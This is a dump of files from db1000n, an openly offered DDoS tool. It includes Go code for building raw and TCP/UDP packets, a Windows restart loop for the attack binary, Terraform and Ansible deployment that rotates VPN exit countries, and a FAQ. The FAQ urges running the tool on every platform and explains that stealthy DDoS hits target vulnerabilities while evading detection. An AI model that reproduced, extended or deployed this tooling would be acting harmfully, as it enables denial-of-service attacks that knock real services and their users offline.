%temp%\GetDB1000N.ps1 %temp% 39 | rem Assume that archive contained executable file named db1000n.exe and try to run it 40 | :StartApp 41 | rem Starts the app and if it returns 0 exit code it does "goto End", breaking loop 42 | %temp%/db1000n.exe && goto End 43 | rem Otherwise, if exit code is non zero, report and restart 44 | echo DB1000N crahed with exit code %errorlevel%, restarting 45 | goto StartApp 46 | :End 47 | exit /b 0 48 | -------------------------------------------------------------------------------- /terraform/aws_eks/modules/eks-cluster/main.tf: -------------------------------------------------------------------------------- 1 | # Create EKS cluster role 2 | resource "aws_iam_role" "eks_cluster" { 3 | name = "AWSEKSClusterRole" 4 | # name = "AmazonEKSClusterRole" 5 | assume_role_policy = data.aws_iam_policy_document.eks_cluster_assume_role_policy.json 6 | 7 | tags = { 8 | Cluster = var.cluster_name 9 | } 10 | 11 | lifecycle { 12 | ignore_changes = [name, name_prefix] 13 | } 14 | } 15 | 16 | # Create EKS cluster role policy attachment 17 | resource "aws_iam_role_policy_attachment" "eks_cluster_AmazonEKSClusterPolicy" { 18 | policy_arn = "arn:aws:iam::aws:policy/AmazonEKSClusterPolicy" 19 | role = aws_iam_role.eks_cluster.name 20 | } 21 | 22 | resource "aws_iam_role_policy_attachment" "eks_cluster_AmazonEKSServicePolicy" { 23 | policy_arn = "arn:aws:iam::aws:policy/AmazonEKSServicePolicy" 24 | role = aws_iam_role.eks_cluster.name 25 | } 26 | 27 | # Create EKS cluster autoscaler role 28 | resource "aws_iam_role" "eks_cluster_autoscaler" { 29 | name = "AmazonEKSClusterAutoscalerRole" 30 | assume_role_policy = data.aws_iam_policy_document.assume_role_policy_web_identity.json 31 | 32 | inline_policy { 33 | name = "AmazonEKSClusterAutoscalerPolicy" 34 | policy = data.aws_iam_policy_document.eks_cluster_autoscaler_policy.json 35 | } 36 | 37 | tags = { 38 | Cluster = var.cluster_name 39 | } 40 | 41 | lifecycle { 42 | ignore_changes = [name, name_prefix] 43 | } 44 | 45 | depends_on = [aws_iam_openid_connect_provider.oidc_provider] 46 | } 47 | 48 | # Create EKS cluster 49 | resource "aws_eks_cluster" "eks_cluster" { 50 | name = var.cluster_name 51 | version = var.cluster_version 52 | role_arn = aws_iam_role.eks_cluster.arn 53 | enabled_cluster_log_types = ["api", "audit", "authenticator", "controllerManager", "scheduler"] 54 | 55 | vpc_config { 56 | security_group_ids = [aws_security_group.control_plane.id] 57 | subnet_ids = var.subnets 58 | } 59 | 60 | depends_on = [ 61 | aws_iam_role_policy_attachment.eks_cluster_AmazonEKSClusterPolicy, 62 | aws_iam_role_policy_attachment.eks_cluster_AmazonEKSServicePolicy 63 | ] 64 | } 65 | 66 | # create OIDC provider 67 | resource "aws_iam_openid_connect_provider" "oidc_provider" { 68 | client_id_list = ["sts.amazonaws.com"] 69 | thumbprint_list = [data.tls_certificate.cert.certificates[0].sha1_fingerprint] 70 | url = aws_eks_cluster.eks_cluster.identity[0].oidc[0].issuer 71 | } 72 | 73 | # Create EKS cluster security group 74 | resource "aws_security_group" "control_plane" { 75 | name = "${var.cluster_name}-control-plane" 76 | description = "Cluster communication with worker nodes" 77 | vpc_id = var.vpc_id 78 | 79 | egress { 80 | from_port = 0 81 | to_port = 0 82 | protocol = "-1" 83 | cidr_blocks = ["0.0.0.0/0"] 84 | } 85 | 86 | revoke_rules_on_delete = true 87 | 88 | lifecycle { 89 | create_before_destroy = true 90 | } 91 | 92 | tags = { 93 | Name = "${var.cluster_name}-control-plane" 94 | Cluster = var.cluster_name 95 | } 96 | } 97 | 98 | # Create EKS cluster security group rules 99 | resource "aws_security_group_rule" "control_plane_ingress_nodes" { 100 | description = "Allow cluster control plane to receive communication from the worker Kubelets" 101 | type = "ingress" 102 | from_port = 443 103 | to_port = 443 104 | protocol = "tcp" 105 | security_group_id = aws_security_group.control_plane.id 106 | source_security_group_id = var.source_security_groups 107 | } -------------------------------------------------------------------------------- /docs/faq.md: -------------------------------------------------------------------------------- 1 | # FAQ 2 | 3 | ???+ faq "Where can I find advanced documentation?" 4 | 5 | [Here](/db1000n/advanced-docs/advanced-and-devs/) 6 | 7 | --- 8 | 9 | ???+ faq "I installed `db1000n` but it's not working properly. What to do?" 10 | 11 | Create [Issue](https://github.com/Arriven/db1000n/issues) and community will help you with solving a problem 12 | 13 | --- 14 | 15 | ???+ faq "I'm **not** a developer, how can I help to project?" 16 | 17 | - Share information about `db1000n` in social media, with your friends and colleagues 18 | - Run `db1000n` on every possible platform (local machine, public clouds, Docker, Kubernetes, etc) 19 | - Create [Issues](https://github.com/Arriven/db1000n/issues) or 20 | [Pull Requests](https://github.com/Arriven/db1000n/pulls) 21 | if you found any bugs, missed documentation, misspells, etc 22 | 23 | --- 24 | 25 | ???+ faq "I'm a developer, how can I help to project?" 26 | 27 | - Check [Issues](https://github.com/Arriven/db1000n/issues) to help with important tasks 28 | - Check our codebase and make [PRs](https://github.com/Arriven/db1000n/pulls) 29 | - Test an app on different platforms and report bugs or feature requests 30 | 31 | --- 32 | 33 | ???+ faq "When I run `db1000n` I see that it generates low amount of traffic. Isn't that bad?" 34 | 35 | ???+ info "it's okay" 36 | 37 | The app is configurable to generate set amount of traffic (controlled by the number 38 | of targets, their type, and attack interval for each of them). 39 | The main reason it works that way is because there are two main types of ddos: 40 | 41 | - Straightforward load generation (easy to implement, easy to defend from) - as effective 42 | as the amount of raw traffic you can generate 43 | 44 | - Actual denial of service that aims to remain as undetected as possible by simulating plausible 45 | traffic and hitting concrete vulnerabilities in the target (or targets). This type of ddos doesn't 46 | require a lot of traffic and thus is mostly limited by the amount of clients generating this type 47 | of load (or rather unique IPs) 48 | 49 | --- 50 | 51 | ???+ faq "Should I care about costs if I run an app in public cloud?" 52 | 53 | ???+ info "[Yes](https://github.com/Arriven/db1000n/issues/153)" 54 | 55 | Cloud providers could charge a huge amount of money not only for compute resources but for traffic as well. 56 | If you run an app in the cloud please control your billing 57 | 58 | --- 59 | 60 | ???+ faq "Can I leave the site for the night?" 61 | 62 | Yes, you can. I personally leave the browser on overnight and it works fine. 63 | 64 | --- 65 | 66 | ???+ faq "How can I make sure that the computer does not go to sleep while the site is running?" 67 | 68 | To do this, you need to install a program which keeps the screen turned off. Instructions for different operating systems below: 69 | 70 | - I have Windows: Caffeinated ([download](https://www.microsoft.com/en-us/p/windows-caffeinated/9pbvhhsn78bl?activetab=pivot:overviewtab)) 71 | - I have Mac OS: Amphetamine ([download](https://apps.apple.com/us/app/amphetamine/id937984704?mt=12)) 72 | 73 | --- 74 | 75 | ???+ faq "What are primitive jobs?" 76 | 77 | Primitive jobs rely on generating as much raw traffic as possible. This might exhaust your system. They are also easier to detect and unadvisable to be used in the cloud environment. 78 | 79 | --- 80 | 81 | ???+ faq "The app shows low response rate, is it ok?" 82 | 83 | Low response rate alone is not enough to be a problem as it could be an indication that current targets are down but you can try to perform additional checks in case you think the rate is abnormal (trying to access one of the targets via curl/browser, checking network stats via other tools like bmon/Task manager, enabling and inspecting debug logs, etc.) 84 | -------------------------------------------------------------------------------- /ansible/linux/setup.yaml: -------------------------------------------------------------------------------- 1 | - name: setup db1000n on plain VM 2 | gather_facts: false 3 | hosts: all 4 | become: true 5 | tasks: 6 | 7 | - name: cleanup old Docker versions 8 | apt: 9 | pkg: "{{ item }}" 10 | state: absent 11 | with_items: 12 | - docker 13 | - docker-engine 14 | - docker.io 15 | - containerd 16 | - runc 17 | 18 | - name: update repositories and install packages 19 | apt: 20 | pkg: "{{ item }}" 21 | state: present 22 | update_cache: yes 23 | with_items: 24 | - ca-certificates 25 | - curl 26 | - gnupg 27 | - lsb-release 28 | - cron 29 | 30 | - name: add Docker repository 31 | shell: | 32 | curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg 33 | echo \ 34 | "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu \ 35 | $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null 36 | 37 | - name: install Docker 38 | apt: 39 | pkg: "{{ item }}" 40 | state: present 41 | update_cache: yes 42 | with_items: 43 | - docker-ce 44 | - docker-ce-cli 45 | - containerd.io 46 | 47 | - name: copy VPN countries list 48 | copy: 49 | src: countries.txt 50 | dest: /countries.txt 51 | when: setup_vpn == True 52 | 53 | - name: initial cron script 54 | shell: | 55 | echo "#! /bin/bash" >> /run.sh 56 | echo "docker stop db1000n" >> /run.sh 57 | chmod +x /run.sh 58 | 59 | - name: add VPN reconnect and docker run to cron script 60 | shell: | 61 | echo "docker exec vpn expressvpn disconnect" >> /run.sh 62 | echo 'docker exec vpn expressvpn connect "$(shuf -n 1 /countries.txt)"' >> /run.sh 63 | echo "docker run --name=db1000n --pull=always --net=container:vpn -e PUID=1000 -e PGID=1000 -e ENABLE_PRIMITIVE=false --rm -d ghcr.io/arriven/db1000n:latest" >> /run.sh 64 | when: setup_vpn == True 65 | 66 | - name: add docker run to cron script 67 | shell: | 68 | echo "docker run --name=db1000n --pull=always -e PUID=1000 -e PGID=1000 -e ENABLE_PRIMITIVE=false --rm -d ghcr.io/arriven/db1000n:latest" >> /run.sh 69 | when: setup_vpn != True 70 | 71 | - name: start VPN container 72 | shell: | 73 | docker run \ 74 | --env=ACTIVATION_CODE={{ expressvpn_activation_code }} \ 75 | --env=PREFERRED_PROTOCOL=auto \ 76 | --env=LIGHTWAY_CIPHER=auto \ 77 | --env=SERVER=$(shuf -n 1 /countries.txt) \ 78 | -e NETWORK=192.168.1.0/24 \ 79 | --cap-add=NET_ADMIN \ 80 | --device=/dev/net/tun \ 81 | --privileged \ 82 | --tty=true \ 83 | --name=vpn \ 84 | --detach=true \ 85 | --dns=1.1.1.1 \ 86 | --tty=true \ 87 | polkaned/expressvpn \ 88 | /bin/bash 89 | 90 | sleep 10 91 | when: (setup_vpn == True) and (expressvpn_activation_code is defined) and (expressvpn_activation_code|length > 0) 92 | 93 | - name: update crontab 94 | shell: (crontab -l ; echo '*/10 * * * * /usr/bin/sudo /run.sh') | crontab - 95 | 96 | - name: initial Docker run with VPN 97 | shell: docker run --name=db1000n --net=container:vpn -e PUID=1000 -e PGID=1000 -e ENABLE_PRIMITIVE=false --rm -d ghcr.io/arriven/db1000n:latest 98 | when: setup_vpn == True 99 | 100 | - name: initial Docker run without VPN 101 | shell: docker run --name=db1000n -e PUID=1000 -e PGID=1000 -e ENABLE_PRIMITIVE=false --rm -d ghcr.io/arriven/db1000n:latest 102 | when: setup_vpn != True 103 | -------------------------------------------------------------------------------- /src/job/complex.go: -------------------------------------------------------------------------------- 1 | // MIT License 2 | 3 | // Copyright (c) [2022] [Bohdan Ivashko (https://github.com/Arriven)] 4 | 5 | // Permission is hereby granted, free of charge, to any person obtaining a copy 6 | // of this software and associated documentation files (the "Software"), to deal 7 | // in the Software without restriction, including without limitation the rights 8 | // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | // copies of the Software, and to permit persons to whom the Software is 10 | // furnished to do so, subject to the following conditions: 11 | 12 | // The above copyright notice and this permission notice shall be included in all 13 | // copies or substantial portions of the Software. 14 | 15 | // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | // SOFTWARE. 22 | 23 | package job 24 | 25 | import ( 26 | "context" 27 | "fmt" 28 | "sync" 29 | 30 | "github.com/google/uuid" 31 | "go.uber.org/zap" 32 | 33 | "github.com/Arriven/db1000n/src/job/config" 34 | "github.com/Arriven/db1000n/src/utils/metrics" 35 | "github.com/Arriven/db1000n/src/utils/templates" 36 | ) 37 | 38 | // "sequence" in config 39 | func sequenceJob(ctx context.Context, args config.Args, globalConfig *GlobalConfig, a *metrics.Accumulator, logger *zap.Logger) (data any, err error) { 40 | var jobConfig struct { 41 | BasicJobConfig 42 | 43 | Jobs []config.Config 44 | } 45 | 46 | if err := ParseConfig(&jobConfig, args, *globalConfig); err != nil { 47 | return nil, fmt.Errorf("error parsing job config: %w", err) 48 | } 49 | 50 | for _, cfg := range jobConfig.Jobs { 51 | job := Get(cfg.Type) 52 | if job == nil { 53 | return nil, fmt.Errorf("unknown job %q", cfg.Type) 54 | } 55 | 56 | data, err := job(ctx, cfg.Args, globalConfig, a, logger) 57 | if err != nil { 58 | return nil, fmt.Errorf("error running job: %w", err) 59 | } 60 | 61 | ctx = context.WithValue(ctx, templates.ContextKey("data."+cfg.Name), data) 62 | } 63 | 64 | return nil, nil 65 | } 66 | 67 | // "parallel" in config 68 | func parallelJob(ctx context.Context, args config.Args, globalConfig *GlobalConfig, a *metrics.Accumulator, logger *zap.Logger) (data any, err error) { 69 | ctx, cancel := context.WithCancel(ctx) 70 | defer cancel() 71 | 72 | var jobConfig struct { 73 | BasicJobConfig 74 | 75 | Jobs []config.Config 76 | } 77 | 78 | if err := ParseConfig(&jobConfig, args, *globalConfig); err != nil { 79 | return nil, fmt.Errorf("error parsing job config: %w", err) 80 | } 81 | 82 | var wg sync.WaitGroup 83 | 84 | for i := range jobConfig.Jobs { 85 | job := Get(jobConfig.Jobs[i].Type) 86 | if job == nil { 87 | logger.Warn("Unknown job", zap.String("type", jobConfig.Jobs[i].Type)) 88 | 89 | continue 90 | } 91 | 92 | if globalConfig.ScaleFactor > 0 { 93 | jobConfig.Jobs[i].Count = computeCount(jobConfig.Jobs[i].Count, globalConfig.ScaleFactor) 94 | } 95 | 96 | for j := 0; j < jobConfig.Jobs[i].Count; j++ { 97 | wg.Add(1) 98 | 99 | go func(i int, a *metrics.Accumulator) { 100 | if _, err := job(ctx, jobConfig.Jobs[i].Args, globalConfig, a, logger); err != nil { 101 | logger.Error("error running one of the jobs", zap.Error(err)) 102 | } 103 | 104 | wg.Done() 105 | }(i, a.Clone(uuid.NewString())) // metrics.Accumulator is not safe for concurrent use, so let's make a new one 106 | } 107 | } 108 | 109 | wg.Wait() 110 | 111 | return nil, nil 112 | } 113 | -------------------------------------------------------------------------------- /src/core/packetgen/connection.go: -------------------------------------------------------------------------------- 1 | // MIT License 2 | 3 | // Copyright (c) [2022] [Bohdan Ivashko (https://github.com/Arriven)] 4 | 5 | // Permission is hereby granted, free of charge, to any person obtaining a copy 6 | // of this software and associated documentation files (the "Software"), to deal 7 | // in the Software without restriction, including without limitation the rights 8 | // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | // copies of the Software, and to permit persons to whom the Software is 10 | // furnished to do so, subject to the following conditions: 11 | 12 | // The above copyright notice and this permission notice shall be included in all 13 | // copies or substantial portions of the Software. 14 | 15 | // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | // SOFTWARE. 22 | 23 | package packetgen 24 | 25 | import ( 26 | "context" 27 | "crypto/tls" 28 | "fmt" 29 | "net" 30 | "time" 31 | 32 | "github.com/google/gopacket" 33 | 34 | "github.com/Arriven/db1000n/src/utils" 35 | ) 36 | 37 | // ConnectionConfig describes which network to use when sending packets 38 | type ConnectionConfig struct { 39 | Type string 40 | Args map[string]any 41 | Proxy *utils.ProxyParams 42 | } 43 | 44 | func OpenConnection(ctx context.Context, c ConnectionConfig) (Connection, error) { 45 | switch c.Type { 46 | case "raw": 47 | return openRawConn() 48 | case "net": 49 | var cfg netConnConfig 50 | if err := utils.Decode(c.Args, &cfg); err != nil { 51 | return nil, fmt.Errorf("error decoding connection config: %w", err) 52 | } 53 | 54 | return openNetConn(ctx, cfg, c.Proxy) 55 | default: 56 | return nil, fmt.Errorf("unknown connection type: %v", c.Type) 57 | } 58 | } 59 | 60 | type Connection interface { 61 | Write(Packet) (int, error) 62 | Read([]byte) (int, error) 63 | Close() error 64 | Target() string 65 | } 66 | 67 | type netConnConfig struct { 68 | Protocol string 69 | Address string 70 | Timeout time.Duration 71 | Proxy utils.ProxyParams 72 | TLSClientConfig *tls.Config 73 | } 74 | 75 | type netConn struct { 76 | net.Conn 77 | buf gopacket.SerializeBuffer 78 | 79 | target string 80 | } 81 | 82 | func openNetConn(ctx context.Context, c netConnConfig, proxyParams *utils.ProxyParams) (*netConn, error) { 83 | conn, err := utils.GetProxyFunc(ctx, utils.NonNilOrDefault(proxyParams, utils.ProxyParams{}), c.Protocol)(c.Protocol, c.Address) 84 | 85 | switch { 86 | case err != nil: 87 | return nil, err 88 | case c.TLSClientConfig == nil: 89 | return &netConn{Conn: conn, buf: gopacket.NewSerializeBuffer(), target: c.Protocol + "://" + c.Address}, nil 90 | } 91 | 92 | tlsConn := tls.Client(conn, c.TLSClientConfig) 93 | if err = tlsConn.Handshake(); err != nil { 94 | tlsConn.Close() 95 | 96 | return nil, err 97 | } 98 | 99 | return &netConn{Conn: tlsConn, buf: gopacket.NewSerializeBuffer(), target: c.Protocol + "://" + c.Address}, nil 100 | } 101 | 102 | func (conn *netConn) Write(packet Packet) (n int, err error) { 103 | if err = packet.Serialize(conn.buf); err != nil { 104 | return 0, fmt.Errorf("error serializing packet: %w", err) 105 | } 106 | 107 | return conn.Conn.Write(conn.buf.Bytes()) 108 | } 109 | 110 | func (conn *netConn) Close() error { 111 | return conn.Conn.Close() 112 | } 113 | 114 | func (conn *netConn) Target() string { return conn.target } 115 | 116 | func (conn *netConn) Read(buf []byte) (int, error) { return conn.Conn.Read(buf) } 117 | -------------------------------------------------------------------------------- /src/core/packetgen/transport.go: -------------------------------------------------------------------------------- 1 | // MIT License 2 | 3 | // Copyright (c) [2022] [Bohdan Ivashko (https://github.com/Arriven)] 4 | 5 | // Permission is hereby granted, free of charge, to any person obtaining a copy 6 | // of this software and associated documentation files (the "Software"), to deal 7 | // in the Software without restriction, including without limitation the rights 8 | // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | // copies of the Software, and to permit persons to whom the Software is 10 | // furnished to do so, subject to the following conditions: 11 | 12 | // The above copyright notice and this permission notice shall be included in all 13 | // copies or substantial portions of the Software. 14 | 15 | // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | // SOFTWARE. 22 | 23 | package packetgen 24 | 25 | import ( 26 | "fmt" 27 | 28 | "github.com/google/gopacket" 29 | "github.com/google/gopacket/layers" 30 | 31 | "github.com/Arriven/db1000n/src/utils" 32 | ) 33 | 34 | func BuildTransportLayer(c LayerConfig, network gopacket.NetworkLayer) (gopacket.TransportLayer, error) { 35 | switch c.Type { 36 | case "": 37 | return nil, nil 38 | case "tcp": 39 | var packetConfig TCPPacketConfig 40 | if err := utils.Decode(c.Data, &packetConfig); err != nil { 41 | return nil, err 42 | } 43 | 44 | return buildTCPPacket(packetConfig, network), nil 45 | case "udp": 46 | var packetConfig UDPPacketConfig 47 | if err := utils.Decode(c.Data, &packetConfig); err != nil { 48 | return nil, err 49 | } 50 | 51 | return buildUDPPacket(packetConfig, network), nil 52 | default: 53 | return nil, fmt.Errorf("unsupported link layer type %s", c.Type) 54 | } 55 | } 56 | 57 | // UDPPacketConfig describes udp layer configuration 58 | type UDPPacketConfig struct { 59 | SrcPort int 60 | DstPort int 61 | } 62 | 63 | func buildUDPPacket(c UDPPacketConfig, network gopacket.NetworkLayer) *layers.UDP { 64 | result := &layers.UDP{ 65 | SrcPort: layers.UDPPort(c.SrcPort), 66 | DstPort: layers.UDPPort(c.DstPort), 67 | } 68 | if err := result.SetNetworkLayerForChecksum(network); err != nil { 69 | return nil 70 | } 71 | 72 | return result 73 | } 74 | 75 | // TCPFlagsConfig stores flags to be set on tcp layer 76 | type TCPFlagsConfig struct { 77 | SYN bool 78 | ACK bool 79 | FIN bool 80 | RST bool 81 | PSH bool 82 | URG bool 83 | ECE bool 84 | CWR bool 85 | NS bool 86 | } 87 | 88 | // TCPPacketConfig describes tcp layer configuration 89 | type TCPPacketConfig struct { 90 | SrcPort int 91 | DstPort int 92 | Seq uint32 93 | Ack uint32 94 | Window uint16 95 | Urgent uint16 96 | Flags TCPFlagsConfig 97 | } 98 | 99 | // buildTCPPacket generates a layers.TCP and returns it with source port and destination port 100 | func buildTCPPacket(c TCPPacketConfig, network gopacket.NetworkLayer) *layers.TCP { 101 | result := &layers.TCP{ 102 | SrcPort: layers.TCPPort(c.SrcPort), 103 | DstPort: layers.TCPPort(c.DstPort), 104 | Window: c.Window, 105 | Urgent: c.Urgent, 106 | Seq: c.Seq, 107 | Ack: c.Ack, 108 | SYN: c.Flags.SYN, 109 | ACK: c.Flags.ACK, 110 | FIN: c.Flags.FIN, 111 | RST: c.Flags.RST, 112 | PSH: c.Flags.PSH, 113 | URG: c.Flags.URG, 114 | ECE: c.Flags.ECE, 115 | CWR: c.Flags.CWR, 116 | NS: c.Flags.NS, 117 | } 118 | if err := result.SetNetworkLayerForChecksum(network); err != nil { 119 | return nil 120 | } 121 | 122 | return result 123 | } 124 | -------------------------------------------------------------------------------- /src/utils/ota/README.md: -------------------------------------------------------------------------------- 1 | # Over-the-air updates 2 | 3 | Lots of maintainers run their needles on a bare metal machines. 4 | As long as this project is so frequently updated, it might be 5 | a good idea to let them update it without the hassle. 6 | 7 | - [x] Enabled automatic time-based version check 8 | - [x] Enabled application self-restart after it downloaded the update 9 | 10 | ## Description 11 | 12 | Support for the application self-update by downloading the latest release from the official repository. 13 | 14 | ```text 15 | Stay strong, be the first in line! 16 | ``` 17 | 18 | The version should be embedded in the binary during the build, see the `build` 19 | target in the Makefile. 20 | 21 | ## Usage 22 | 23 | ### Available flags 24 | 25 | ```bash 26 | -enable-self-update 27 | Enable the application automatic updates on the startup 28 | -restart-on-update 29 | Allows application to restart upon the successful update (ignored if auto-update is disabled) (default true) 30 | -self-update-check-frequency duration 31 | How often to run auto-update checks (default 24h0m0s) 32 | -skip-update-check-on-start 33 | Allows to skip the update check at the startup (usually set automatically by the previous version) (default false) 34 | ``` 35 | 36 | The default behavior if the self-update enabled: 37 | 38 | ```bash 39 | * Check for the update 40 | * If update is available - download it 41 | * If auto-restart is enabled 42 | * Notify the user that a newer version is available 43 | * Fork-Exec a new process (will have a different PID), add a flag to skip the version check upon startup 44 | * Stop the current process 45 | * If auto-restart is disabled - notify user that manual restart is required 46 | * If update is NOT available - schedule the next check 47 | ``` 48 | 49 | ### Examples 50 | 51 | To update your needle, start it with a flag `-enable-self-update` 52 | 53 | ```sh 54 | ./db1000n -enable-self-update 55 | ``` 56 | 57 | #### Advanced options 58 | 59 | Start the needle with the **self-update & self-restart** 60 | 61 | ```bash 62 | $ ./db1000n -enable-self-update 63 | 0000/00/00 00:00:00 main.go:82: DB1000n [Version: v0.6.4][PID=75259] 64 | 0000/00/00 00:00:00 main.go:166: Running a check for a newer version... 65 | 0000/00/00 00:00:00 main.go:176: Newer version of the application is found [0.7.0] 66 | 0000/00/00 00:00:00 main.go:177: What's new: 67 | * Added some great improvements 68 | * Added some spectacular bugs 69 | 0000/00/00 00:00:00 main.go:180: Auto restart is enabled, restarting the application to run a new version 70 | 0000/00/00 00:00:00 restart.go:45: new process has been started successfully [old_pid=75259,new_pid=75262] 71 | 72 | # NOTE: Process 75259 exited, Process 75262 has started with a flag to skip version check on the startup 73 | 74 | 0000/00/00 00:00:00 main.go:82: DB1000n [Version: v0.7.0][PID=75262] 75 | 0000/00/00 00:00:00 main.go:155: Version update on startup is skipped, next update check is scheduled in 24h0m0s 76 | ``` 77 | 78 | Start the needle with the self-update but do not restart the process upon update (`systemd` friendly) 79 | 80 | ```bash 81 | $ ./db1000n -enable-self-update -self-update-check-frequency=5m -restart-on-update=false 82 | 0000/00/00 00:00:00 main.go:82: DB1000n [Version: v0.6.4][PID=75320] 83 | 0000/00/00 00:00:00 main.go:166: Running a check for a newer version... 84 | 0000/00/00 00:00:00 main.go:176: Newer version of the application is found [0.7.0] 85 | 0000/00/00 00:00:00 main.go:177: What's new: 86 | * Added some great improvements 87 | * Added some spectacular bugs 88 | 0000/00/00 00:00:00 main.go:191: Auto restart is disabled, restart the application manually to apply changes! 89 | ``` 90 | 91 | ## References 92 | 93 | 1. Graceful restart with zero downtime for TCP connection - [https://github.com/Scalingo/go-graceful-restart-example](https://github.com/Scalingo/go-graceful-restart-example) 94 | 1. Graceful restart with zero downtime for TCP connection (two variants) [https://github.com/rcrowley/goagain](https://github.com/rcrowley/goagain) 95 | 1. Graceful restart with zero downtime for TCP connection (alternative) [https://grisha.org/blog/2014/06/03/graceful-restart-in-golang](https://grisha.org/blog/2014/06/03/graceful-restart-in-golang) 96 | -------------------------------------------------------------------------------- /src/utils/ota/ota.go: -------------------------------------------------------------------------------- 1 | // Package ota [allows hot update and reload of the executable] 2 | package ota 3 | 4 | import ( 5 | "flag" 6 | "fmt" 7 | "time" 8 | 9 | "github.com/blang/semver" 10 | "github.com/rhysd/go-github-selfupdate/selfupdate" 11 | "go.uber.org/zap" 12 | 13 | "github.com/Arriven/db1000n/src/utils" 14 | ) 15 | 16 | var ( 17 | // Version is a release version embedded into the app 18 | Version = "v0.0.1" 19 | // Repository to check for updates 20 | Repository = "Arriven/db1000n" // Could be changed via the ldflags 21 | ) 22 | 23 | // Config defines OTA parameters. 24 | type Config struct { 25 | doAutoUpdate, doRestartOnUpdate, skipUpdateCheckOnStart bool 26 | autoUpdateCheckFrequency time.Duration 27 | } 28 | 29 | // NewConfigWithFlags returns a Config initialized with command line flags. 30 | func NewConfigWithFlags() *Config { 31 | const defaultUpdateCheckFrequency = 24 * time.Hour 32 | 33 | var res Config 34 | 35 | flag.BoolVar(&res.doAutoUpdate, "enable-self-update", utils.GetEnvBoolDefault("ENABLE_SELF_UPDATE", false), 36 | "Enable the application automatic updates on the startup") 37 | flag.BoolVar(&res.doRestartOnUpdate, "restart-on-update", utils.GetEnvBoolDefault("RESTART_ON_UPDATE", true), 38 | "Allows application to restart upon successful update (ignored if auto-update is disabled)") 39 | flag.BoolVar(&res.skipUpdateCheckOnStart, "skip-update-check-on-start", utils.GetEnvBoolDefault("SKIP_UPDATE_CHECK_ON_START", false), 40 | "Allows to skip the update check at the startup (usually set automatically by the previous version)") 41 | flag.DurationVar(&res.autoUpdateCheckFrequency, "self-update-check-frequency", 42 | utils.GetEnvDurationDefault("SELF_UPDATE_CHECK_FREQUENCY", defaultUpdateCheckFrequency), "How often to run auto-update checks") 43 | 44 | return &res 45 | } 46 | 47 | // WatchUpdates performs OTA updates based on the config. 48 | func WatchUpdates(logger *zap.Logger, cfg *Config) { 49 | if !cfg.doAutoUpdate { 50 | return 51 | } 52 | 53 | if !cfg.skipUpdateCheckOnStart { 54 | runUpdate(logger, cfg.doRestartOnUpdate) 55 | } else { 56 | logger.Info("version update on startup is skipped", 57 | zap.Duration("auto_update_check_frequency", cfg.autoUpdateCheckFrequency)) 58 | } 59 | 60 | periodicalUpdateChecker := time.NewTicker(cfg.autoUpdateCheckFrequency) 61 | defer periodicalUpdateChecker.Stop() 62 | 63 | for range periodicalUpdateChecker.C { 64 | runUpdate(logger, cfg.doRestartOnUpdate) 65 | } 66 | } 67 | 68 | func runUpdate(logger *zap.Logger, doRestartOnUpdate bool) { 69 | logger.Info("running a check for a newer version") 70 | 71 | isUpdateFound, newVersion, changeLog, err := doAutoUpdate() 72 | 73 | switch { 74 | case err != nil: 75 | logger.Warn("auto-update failed", zap.Error(err)) 76 | 77 | return 78 | case !isUpdateFound: 79 | logger.Info("running the latest version") 80 | 81 | return 82 | } 83 | 84 | logger.Info("newer version of the application is found", zap.String("version", newVersion)) 85 | logger.Info("changelog", zap.String("changes", changeLog)) 86 | 87 | if !doRestartOnUpdate { 88 | logger.Warn("auto restart is disabled, restart the application manually to apply changes") 89 | 90 | return 91 | } 92 | 93 | logger.Info("auto restart is enabled, restarting the application to run a new version") 94 | 95 | if err = restart(logger, "-skip-update-check-on-start"); err != nil { 96 | logger.Warn("Failed to restart the application after the update to the new version", zap.Error(err)) 97 | logger.Warn("restart the application manually to apply changes") 98 | } 99 | } 100 | 101 | // doAutoUpdate updates the app to the latest version. 102 | func doAutoUpdate() (updateFound bool, newVersion, changeLog string, err error) { 103 | v, err := semver.ParseTolerant(Version) 104 | if err != nil { 105 | return false, "", "", fmt.Errorf("binary version validation failed: %w", err) 106 | } 107 | 108 